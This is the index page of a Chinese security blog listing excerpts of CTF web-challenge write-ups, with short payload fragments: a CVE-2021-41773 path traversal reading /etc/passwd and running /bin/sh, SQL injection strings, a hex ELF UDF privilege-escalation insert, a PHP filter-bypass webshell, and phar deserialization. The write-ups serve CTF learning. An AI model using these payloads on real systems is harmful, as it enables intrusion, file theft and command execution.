会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Loading
Aninock
首页
联系
订阅
管理
2023年8月19日
CCCamp 2023 - Cybercrime Society Club Germany
摘要: 可以看到如果是amdin用户可以执行date指令,而date指令可以suid提权读取文件 首先看注册过程 邮箱不能和管理员邮箱一样防止覆盖,让后id位数有限制,后面在数据库中可以发现判断是否是管理员用户正是看邮箱是不是admin@cscg.de和id是否大于900000,对于id注册是用1e10科学
阅读全文
posted @ 2023-08-19 20:26 Aninock
阅读(52)
评论(0)
推荐(0)
2023年8月6日
Deconstructf-2023-WEB
摘要: 比赛比较简单,只做web,也是ak了。 where-are-the-cookies 查看robots.txt cookie是no的base64编码,改成yes的base64即可 why-are-types-weird password为 sha1('aaroZmOk') //0e6650701996
阅读全文
posted @ 2023-08-06 14:27 Aninock
阅读(37)
评论(0)
推荐(1)
2023年7月22日
AmateursCTF 2023-sanity
摘要: if (window.debug?.extension) { let res = await fetch(window.debug?.extension.toString()); extension = await res.json(); } 对于这题第一个点就是如何通过这个判断。题目有个地方可以插
阅读全文
posted @ 2023-07-22 16:58 Aninock
阅读(39)
评论(0)
推荐(0)
2022年8月22日
[GFCTF 2021]文件查看器
摘要: www.zip下载源码 看源码 传入两个参数c和m,然后创建新的c类,执行c类的m函数 没有的类通过autoload调用,限定目录和后缀 默认给三个类能调用,看主要的file类 有一个getfile函数,能够调用和重写内容,但是内容我们没法指定 注意有三个类有一个pop链 <?php class U
阅读全文
posted @ 2022-08-22 14:35 Aninock
阅读(340)
评论(0)
推荐(0)
2022年7月24日
CTFSHOW-web263-php不同的session处理
摘要: PHP session 存储方式 php_serialize 经过 serialize() 函数序列化数组 a:1:{s:4:“name”;s:5:“ocean”;} php(默认) 键名 竖线 经过 serialize() 函数处理的值 name|s:5:“ocean”; php_binary 键
阅读全文
posted @ 2022-07-24 21:34 Aninock
阅读(92)
评论(0)
推荐(0)
2022年7月16日
nepctf-2022-博学多闻的花花-udf提权
摘要: 时间注入拿到admin密码登入,根据sql逻辑构造udf上传,再通过curl提权查看flag payload: -1';create table zzz (c BLOB);INSERT INTO zzz values(unhex('7F454C4602010100000000000000000003
阅读全文
posted @ 2022-07-16 21:09 Aninock
阅读(111)
评论(0)
推荐(0)
2022年7月13日
NSS日刷-[GFCTF 2021]Baby_Web-CVE-2021-41773
摘要: poc读取 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd poc读取执行 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
阅读全文
posted @ 2022-07-13 14:08 Aninock
阅读(275)
评论(0)
推荐(0)
2022年7月11日
NSS日刷-[第五空间 2021]yet_another_mysql_injection-Qunie
摘要: 传入$password进行查询,获取查询结果中的password和传入的$password进行比较,如果password能知道直接登入即可,否则只能尝试注入 尝试1' or 1=1#,注意到有过滤,在尝试构造 '^0# 提示password,因为这里获取的正确password会和传入的: '^0#
阅读全文
posted @ 2022-07-11 20:11 Aninock
阅读(927)
评论(0)
推荐(0)
2022年7月9日
NSS日刷-[SWPUCTF 2021 新生赛]hardrce_3-open_basedir绕过
摘要: 过滤了异或取反构造,这里用自增 $_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__+
阅读全文
posted @ 2022-07-09 16:18 Aninock
阅读(1661)
评论(0)
推荐(0)
2022年7月3日
NSS日刷-[NISACTF 2022]bingdundun~-phar
摘要: phar://是一种伪协议,个人感觉是用来打包的,可以用它获取打包的文件 注意url,类似文件包含,改成index试试 推测是再后面加上.php再进行文件读取 注意不仅能传图片也能传压缩包,我们目的是执行成php,这里用的phar进行打包 <?php $phar = new Phar("phar.p
阅读全文
posted @ 2022-07-03 20:12 Aninock
阅读(920)
评论(2)
推荐(0)
下一页
公告